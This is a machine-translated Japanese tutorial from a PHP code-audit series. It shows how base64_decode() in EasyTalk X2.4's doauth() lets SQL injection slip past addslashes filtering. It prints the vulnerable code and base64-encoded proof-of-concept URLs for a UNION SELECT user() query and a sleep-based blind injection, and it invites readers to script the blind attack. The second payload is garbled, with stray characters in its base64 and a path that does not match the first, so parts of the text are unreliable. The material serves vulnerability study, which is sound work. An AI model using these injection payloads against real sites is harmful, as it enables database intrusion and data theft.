[PHP コード監査サンプル チュートリアル] SQL インジェクション - 3. グローバル保護による Base64Decode のバイパス

0x01 Background

最近の WEB プログラムには、基本的に SQL インジェクション用のグローバル フィルタリングが備わっています。たとえば、PHP が GPC をオンにしたり、グローバル ファイル common.php で addslashes() 関数を使用したりします。パラメータ、特に一重引用符はフィルタリングされます。前の記事と同様に、グローバル保護をバイパスするには、いくつかのエンコードおよびデコード関数を見つける必要があります。この記事では、base64decode() の状況を紹介します。

この脆弱性は Wuyun から来ています: http://www.wooyun.org/bugs/wooyun-2014-050338

0x02 環境設定

背景を見る easytalk プログラムの低バージョン、バージョン X2.4

①ソース コードのコピーをパッケージ化しました: http://pan.baidu.com/s/1bopOFNL

②解凍 www の easytalk ディレクトリに移動し、プロンプトに従って段階的にインストールします。問題が発生した場合は、Baidu または Google で検索し、次の画像にアクセスしてください:

0x03 脆弱性分析

まず、使用されている ThinkPHP フレームワークは比較的複雑です:

興味のある方は調べてください。初心者の方は、ThinkPHP が受信したパラメーターをフィルターし、サーバーで GPC が有効になっているかどうかに応じて、対応する処理が実行されることを知ることができます:

1. /ThinkPHP/Extend/Library/ORG の 266 行目。 /Util/Input.class.php ファイル:

/** +---------------------------------------------------------- * 如果 magic_quotes_gpc 为关闭状态，这个函数可以转义字符串 +---------------------------------------------------------- * @access public +---------------------------------------------------------- * @param string $string 要处理的字符串 +---------------------------------------------------------- * @return string +---------------------------------------------------------- */static public function addSlashes($string) {    if (!get_magic_quotes_gpc()) {        $string = addslashes($string);    }    return $string;}

2. Seay コード監査システムのグローバル検索機能を使用して、キーワード「base64_decode」を含むファイルを検索し、SettingAction.class.php を見つけます。受け取ったパラメータ認証を Base64_decode する場所が含まれています:

3. この PHP ファイルを追跡したところ、daddslashes 関数は注入フィルタリングに使用されていましたが、base64_decode 関数は認証パラメータをトランスコードして、フィルタリングをバイパスし、インジェクションを実行します:

//认证电子邮件public function doauth() {    $_authmsg=daddslashes($_GET['auth']);//再次判断GPC是否开启并进行注入过滤    $authmsg=base64_decode($_authmsg);//base64_decode函数对参数进行转码处理    $tem=explode(":",$authmsg);//对解码后的参数authmsg按照“：”进行分割存入数组tem中    $send_id=$tem[0];    $user=M('Users');    $row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find();//带入查询，在where子句里，造成注入    if ($_authmsg==$row['auth_email']) {        $user->where("user_id='$send_id'")->setField('auth_email',1);        setcookie('setok', json_encode(array('lang'=>L('mail6'),'ico'=>1)),0,'/');    } else {        setcookie('setok', json_encode(array('lang'=>L('mail7'),'ico'=>2)),0,'/');    }    header('location:'.SITE_URL.'/?m=setting&a=mailauth');}

0x04 Vulnerability Proof

データベース関連情報を取得するための POC を構築します:

http:// localhost/easytalk/?m=setting&a=doauth&auth=aGFja2luZycgdW5pb24gc2VsZWN0IHVzZXIoKSwyIw==

SQL ステートメントを表示し、正常に実行されたことを確認します。

これは次のとおりであることがわかります。ブラインド注入では出力がないため、SQL ブラインド注入ステートメントを使用します。現在のデータベース ユーザー名の最初の文字が 'r' (ASCII 値は 114) かどうかの POC を取得します:

http://localhost/eazytalk/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHVzZXIoKSksSMS wxKS kgPSAxMTQpLHNsZWVwKDUpLDApKSM=

ページは 5 秒間続き、user() の最初の文字が「r」であることを示しています。SQL ステートメントが正常に実行されたことがわかります。

最後に、興味のある学生は自分で行うことができます。このブラインド インジェクションを実行する py スクリプトを作成します。

元のアドレス:

http://www.cnbraid.com/2016/02/18/sql2/